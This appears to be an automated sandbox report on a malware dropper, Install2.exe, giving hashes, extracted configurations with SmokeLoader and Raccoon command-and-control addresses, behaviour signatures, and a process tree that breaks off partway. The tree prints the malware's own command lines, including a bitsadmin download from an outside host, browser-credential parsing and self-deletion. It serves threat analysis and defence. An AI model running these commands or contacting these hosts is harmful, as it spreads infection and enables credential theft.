Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1802s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-04-2021 05:35

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 47 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1836
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2388
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2700
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2716
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2604
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2368
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1380
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1296
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1228
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1092
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1044
                    • C:\Users\Admin\AppData\Roaming\urdtsvf
                      C:\Users\Admin\AppData\Roaming\urdtsvf
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1064
                    • C:\Users\Admin\AppData\Roaming\itdtsvf
                      C:\Users\Admin\AppData\Roaming\itdtsvf
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5612
                      • C:\Users\Admin\AppData\Roaming\itdtsvf
                        C:\Users\Admin\AppData\Roaming\itdtsvf
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4308
                    • C:\Users\Admin\AppData\Roaming\urdtsvf
                      C:\Users\Admin\AppData\Roaming\urdtsvf
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5196
                    • C:\Users\Admin\AppData\Roaming\itdtsvf
                      C:\Users\Admin\AppData\Roaming\itdtsvf
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5992
                      • C:\Users\Admin\AppData\Roaming\itdtsvf
                        C:\Users\Admin\AppData\Roaming\itdtsvf
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3520
                    • C:\Users\Admin\AppData\Roaming\urdtsvf
                      C:\Users\Admin\AppData\Roaming\urdtsvf
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5144
                    • C:\Users\Admin\AppData\Roaming\itdtsvf
                      C:\Users\Admin\AppData\Roaming\itdtsvf
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4296
                      • C:\Users\Admin\AppData\Roaming\itdtsvf
                        C:\Users\Admin\AppData\Roaming\itdtsvf
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3384
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\QLZHEdbaXwRn\QLZHEdbaXwRn.dll",QLZHEdbaXwRn
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:5068
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:60
                    • C:\Users\Admin\AppData\Local\Temp\Install2.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:596
                      • C:\Users\Admin\AppData\Local\Temp\is-V6JUK.tmp\Install2.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-V6JUK.tmp\Install2.tmp" /SL5="$80030,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3100
                        • C:\Users\Admin\AppData\Local\Temp\is-2A2NL.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-2A2NL.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3292
                          • C:\Program Files\Internet Explorer\EZTWOVLTSJ\ultramediaburner.exe
                            "C:\Program Files\Internet Explorer\EZTWOVLTSJ\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1356
                            • C:\Users\Admin\AppData\Local\Temp\is-QJ6VM.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-QJ6VM.tmp\ultramediaburner.tmp" /SL5="$4006A,281924,62464,C:\Program Files\Internet Explorer\EZTWOVLTSJ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:788
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:3368
                          • C:\Users\Admin\AppData\Local\Temp\eb-384a5-286-8cd89-502d1f4b100e0\Doqypipohae.exe
                            "C:\Users\Admin\AppData\Local\Temp\eb-384a5-286-8cd89-502d1f4b100e0\Doqypipohae.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2160
                          • C:\Users\Admin\AppData\Local\Temp\be-0a84b-b6e-61d93-93dd48eb7fe28\Haedajipiqi.exe
                            "C:\Users\Admin\AppData\Local\Temp\be-0a84b-b6e-61d93-93dd48eb7fe28\Haedajipiqi.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2124
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\traph4st.pgu\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2764
                              • C:\Users\Admin\AppData\Local\Temp\traph4st.pgu\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\traph4st.pgu\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4392
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u2jfso5e.gst\requête.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4136
                              • C:\Users\Admin\AppData\Local\Temp\u2jfso5e.gst\requête.exe
                                C:\Users\Admin\AppData\Local\Temp\u2jfso5e.gst\requête.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4468
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:4796
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                    parse.exe -f json -b chrome
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:5940
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                    parse.exe -f json -b edge
                                    8⤵
                                      PID:2220
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                      parse.exe -f json -b firefox
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5056
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ywfq0idm.j54\google-game.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5112
                                • C:\Users\Admin\AppData\Local\Temp\ywfq0idm.j54\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\ywfq0idm.j54\google-game.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:4120
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    7⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:4388
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ey15lhss.m0x\md1_1eaf.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4188
                                • C:\Users\Admin\AppData\Local\Temp\ey15lhss.m0x\md1_1eaf.exe
                                  C:\Users\Admin\AppData\Local\Temp\ey15lhss.m0x\md1_1eaf.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  PID:3752
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2h4kjpmn.txs\askinstall39.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4308
                                • C:\Users\Admin\AppData\Local\Temp\2h4kjpmn.txs\askinstall39.exe
                                  C:\Users\Admin\AppData\Local\Temp\2h4kjpmn.txs\askinstall39.exe
                                  6⤵
                                    PID:4672
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      7⤵
                                        PID:5964
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          8⤵
                                          • Kills process with taskkill
                                          PID:5304
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\erzfly2f.0rr\y1.exe & exit
                                    5⤵
                                      PID:4124
                                      • C:\Users\Admin\AppData\Local\Temp\erzfly2f.0rr\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\erzfly2f.0rr\y1.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:4784
                                        • C:\Users\Admin\AppData\Local\Temp\gG4fIrQs88.exe
                                          "C:\Users\Admin\AppData\Local\Temp\gG4fIrQs88.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:4348
                                          • C:\Users\Admin\AppData\Roaming\1619508841867.exe
                                            "C:\Users\Admin\AppData\Roaming\1619508841867.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619508841867.txt"
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5956
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\gG4fIrQs88.exe"
                                            8⤵
                                              PID:5388
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                9⤵
                                                • Executes dropped EXE
                                                • Runs ping.exe
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4672
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\erzfly2f.0rr\y1.exe"
                                            7⤵
                                              PID:4240
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                8⤵
                                                • Delays execution with timeout.exe
                                                PID:4912
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdgj3i3k.4gw\SunLabsPlayer.exe /S & exit
                                          5⤵
                                            PID:4424
                                            • C:\Users\Admin\AppData\Local\Temp\cdgj3i3k.4gw\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\cdgj3i3k.4gw\SunLabsPlayer.exe /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              PID:5248
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5084
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4580
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:6112
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5580
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:1148
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5548
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                            7⤵
                                                            • Checks for any installed AV software in registry
                                                            PID:2228
                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                            7⤵
                                                            • Download via BitsAdmin
                                                            PID:5584
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZhNu4ylTUuyLBeS -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:4772
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pwJaMv9vlnlvEWs6 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4156
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:2112
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4692
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4576
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5964
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:3124
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QLZHEdbaXwRn\QLZHEdbaXwRn.dll" QLZHEdbaXwRn
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      PID:4140
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QLZHEdbaXwRn\QLZHEdbaXwRn.dll" QLZHEdbaXwRn
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        PID:924
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5632
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4884
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:5696
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5136
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc235A.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5548
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                8⤵
                                                                                  PID:4580
                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:2904
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prwnvnnr.bel\inst.exe & exit
                                                                            5⤵
                                                                              PID:5236
                                                                              • C:\Users\Admin\AppData\Local\Temp\prwnvnnr.bel\inst.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\prwnvnnr.bel\inst.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:5588
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\frfpdpyu.nhf\GcleanerWW.exe /mixone & exit
                                                                              5⤵
                                                                                PID:5416
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phk4buqx.2rm\toolspab1.exe & exit
                                                                                5⤵
                                                                                  PID:5572
                                                                                  • C:\Users\Admin\AppData\Local\Temp\phk4buqx.2rm\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\phk4buqx.2rm\toolspab1.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5908
                                                                                    • C:\Users\Admin\AppData\Local\Temp\phk4buqx.2rm\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\phk4buqx.2rm\toolspab1.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5140
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\istsjxes.g5o\app.exe /8-2222 & exit
                                                                                  5⤵
                                                                                    PID:5812
                                                                                    • C:\Users\Admin\AppData\Local\Temp\istsjxes.g5o\app.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\istsjxes.g5o\app.exe /8-2222
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3264
                                                                                      • C:\Users\Admin\AppData\Local\Temp\istsjxes.g5o\app.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\istsjxes.g5o\app.exe" /8-2222
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies data under HKEY_USERS
                                                                                        PID:1444
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yh2jb0pi.foz\c7ae36fa.exe & exit
                                                                                    5⤵
                                                                                      PID:6012
                                                                                      • C:\Users\Admin\AppData\Local\Temp\yh2jb0pi.foz\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\yh2jb0pi.foz\c7ae36fa.exe
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5208
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                              1⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1016
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Checks processor information in registry
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:4752
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3356
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              PID:4520
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
